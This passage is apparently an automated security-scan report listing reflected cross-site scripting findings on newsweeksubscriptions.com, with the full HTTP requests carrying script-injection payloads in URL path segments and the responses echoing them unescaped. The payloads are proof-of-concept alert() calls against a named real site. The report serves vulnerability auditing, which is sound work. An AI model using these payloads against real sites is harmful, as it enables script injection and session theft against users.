<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/newsweek@emailcustomerservice.com/Netsparker589cd9fdeb73414b91501b3a353febd55243f<script>alert(1)</script>5b2c7c01ebb is not found !</p>
...[SNIP]...

1.251. https://www.newsweeksubscriptions.com/FTcontrol/newsweek@emailcustomerservice.com/Netsparkerd186b3ae09c841c6bee1f9d4f0873575/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/newsweek@emailcustomerservice.com/Netsparkerd186b3ae09c841c6bee1f9d4f0873575/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e85ef<script>alert(1)</script>16b36c3d219 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrole85ef<script>alert(1)</script>16b36c3d219/newsweek@emailcustomerservice.com/Netsparkerd186b3ae09c841c6bee1f9d4f0873575/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:13:50 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 598
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrole85ef<script>alert(1)</script>16b36c3d219/newsweek@emailcustomerservice.com/Netsparkerd186b3ae09c841c6bee1f9d4f0873575 is not found !</p>
...[SNIP]...

1.252. https://www.newsweeksubscriptions.com/FTcontrol/newsweek@emailcustomerservice.com/Netsparkerd186b3ae09c841c6bee1f9d4f0873575/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/newsweek@emailcustomerservice.com/Netsparkerd186b3ae09c841c6bee1f9d4f0873575/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 468b1<script>alert(1)</script>fbed0d930c5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrol/newsweek@emailcustomerservice.com468b1<script>alert(1)</script>fbed0d930c5/Netsparkerd186b3ae09c841c6bee1f9d4f0873575/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:13:55 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 850
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/newsweek@emailcustomerservice.com468b1<script>alert(1)</script>fbed0d930c5/Netsparkerd186b3ae09c841c6bee1f9d4f0873575 is not found !</p>
...[SNIP]...

1.253. https://www.newsweeksubscriptions.com/FTcontrol/newsweek@emailcustomerservice.com/Netsparkerd186b3ae09c841c6bee1f9d4f0873575/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/newsweek@emailcustomerservice.com/Netsparkerd186b3ae09c841c6bee1f9d4f0873575/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5b548<script>alert(1)</script>b47fa40c880 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrol/newsweek@emailcustomerservice.com/Netsparkerd186b3ae09c841c6bee1f9d4f08735755b548<script>alert(1)</script>b47fa40c880/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:14:01 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 850
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...